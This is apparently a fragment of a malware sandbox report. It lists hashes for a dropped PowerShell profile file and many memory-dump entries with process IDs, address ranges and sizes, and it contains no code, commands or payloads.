SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d61d7f65117823a52913b840feed43c6
SHA1e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
SHA256d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
SHA512e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
-
memory/584-87-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/584-86-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-81-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-79-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-78-0x000001BA9DC00000-0x000001BA9DC25000-memory.dmpFilesize
148KB
-
memory/640-98-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/640-91-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/640-97-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/740-109-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/740-102-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/740-108-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/904-113-0x000001ED4B010000-0x000001ED4B03B000-memory.dmpFilesize
172KB
-
memory/904-120-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/904-119-0x000001ED4B010000-0x000001ED4B03B000-memory.dmpFilesize
172KB
-
memory/992-124-0x0000017BDDC80000-0x0000017BDDCAB000-memory.dmpFilesize
172KB
-
memory/1224-57-0x0000000006490000-0x000000000649A000-memory.dmpFilesize
40KB
-
memory/2452-13-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/2452-10-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/2452-1-0x0000000000550000-0x00000000005A8000-memory.dmpFilesize
352KB
-
memory/2452-0-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmpFilesize
4KB
-
memory/4472-66-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-75-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-72-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-74-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4472-73-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4472-65-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-64-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4644-19-0x0000000005E00000-0x00000000062FE000-memory.dmpFilesize
5.0MB
-
memory/4644-21-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4644-14-0x00000000734BE000-0x00000000734BF000-memory.dmpFilesize
4KB
-
memory/4644-17-0x00000000008F0000-0x000000000095C000-memory.dmpFilesize
432KB
-
memory/4644-20-0x0000000005730000-0x00000000057C2000-memory.dmpFilesize
584KB
-
memory/4644-35-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4644-24-0x0000000006970000-0x00000000069AE000-memory.dmpFilesize
248KB
-
memory/4644-23-0x00000000056F0000-0x0000000005702000-memory.dmpFilesize
72KB
-
memory/4644-22-0x0000000005640000-0x00000000056A6000-memory.dmpFilesize
408KB
-
memory/4708-61-0x0000029A68C60000-0x0000029A68C8A000-memory.dmpFilesize
168KB
-
memory/4708-40-0x0000029A68BD0000-0x0000029A68BF2000-memory.dmpFilesize
136KB
-
memory/4708-63-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4708-43-0x0000029A68DA0000-0x0000029A68E16000-memory.dmpFilesize
472KB
-
memory/4708-62-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4908-18-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4908-750-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4908-16-0x00000000010C0000-0x00000000010E0000-memory.dmpFilesize
128KB